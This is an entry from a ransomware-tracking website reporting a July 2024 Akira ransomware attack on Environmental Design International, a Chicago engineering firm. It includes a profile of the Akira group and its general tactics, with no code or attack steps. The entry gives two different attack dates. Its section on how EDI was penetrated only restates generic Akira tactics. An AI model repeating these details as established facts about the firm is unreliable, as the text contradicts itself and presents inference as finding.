Ransomware Attack on EDI by Akira Group: Data Breach Details
Incident Date:
July 25, 2024
Overview
Title
Ransomware Attack on EDI by Akira Group: Data Breach Details
Victim
Environmental Design International
Attacker
Akira
Location
First Reported
July 25, 2024
Ransomware Attack on Environmental Design International Inc. by Akira Group
Overview of Environmental Design International Inc. (EDI)
Environmental Design International Inc. (EDI) is a professional engineering firm based in Chicago, Illinois, established in 1991. With over three decades of experience, EDI has built a reputation for delivering high-quality engineering consulting services across multiple disciplines, including civil engineering, construction engineering, land surveying, environmental consulting, and industrial hygiene. The firm is recognized for its commitment to excellence, innovation, and sustainability, making it a key player in significant infrastructure projects.
Details of the Ransomware Attack
On July 31, 2024, EDI fell victim to a ransomware attack orchestrated by the Akira group. The attack resulted in the unauthorized access and potential leak of 60 GB of sensitive data, including non-disclosure agreements (NDAs), confidential agreements, employees' personal documents, and detailed financial data. This breach poses significant challenges for EDI in securing its data and mitigating the impact of the attack.
About the Akira Ransomware Group
Akira is a rapidly growing ransomware family that first emerged in March 2023. The group targets small to medium-sized businesses across various sectors, including government, manufacturing, technology, education, consulting, pharmaceuticals, and telecommunications. Akira employs double extortion tactics, stealing data before encrypting systems and demanding a ransom for both decryption and data deletion. Their ransom demands typically range from $200,000 to over $4 million.
How Akira Penetrated EDI's Systems
Akira's tactics include unauthorized access to VPNs, credential theft, and lateral movement to deploy the ransomware. They have been observed using tools like RClone, FileZilla, and WinSCP for data exfiltration. In some cases, Akira has deployed a previously unreported backdoor. The group's ability to adapt and target both Windows and Linux-based VMware ESXi virtual machines makes them a formidable threat to organizations like EDI.
EDI's Vulnerabilities
EDI's extensive involvement in high-profile infrastructure projects and its handling of sensitive data make it an attractive target for ransomware groups like Akira. The firm's commitment to innovation and sustainability, while commendable, also necessitates robust cybersecurity measures to protect against sophisticated cyber threats. The breach underscores the importance of continuous vigilance and advanced security protocols in safeguarding critical data.
Sources
Recent Ransomware Attacks
The Recent Ransomware Attacks (RRA) site acts as a watchtower, providing you with near real-time ransomware tracking of attacks, groups and their victims. Given threat actors’ overarching, lucrative success so far, ransomware attacks have become the most ubiquitous, and financially and informationally impactful cyber threat to businesses and organizations today.
The site’s data is generated based on hosting choices of real-world threat actors, and a handful of other trackers. While sanitization efforts have been taken, we cannot guarantee 100% accuracy of the data. Attack updates will be made as source data is reported by reputable sources. By viewing, accessing, or using RRA you acknowledge you are doing so at your own risk.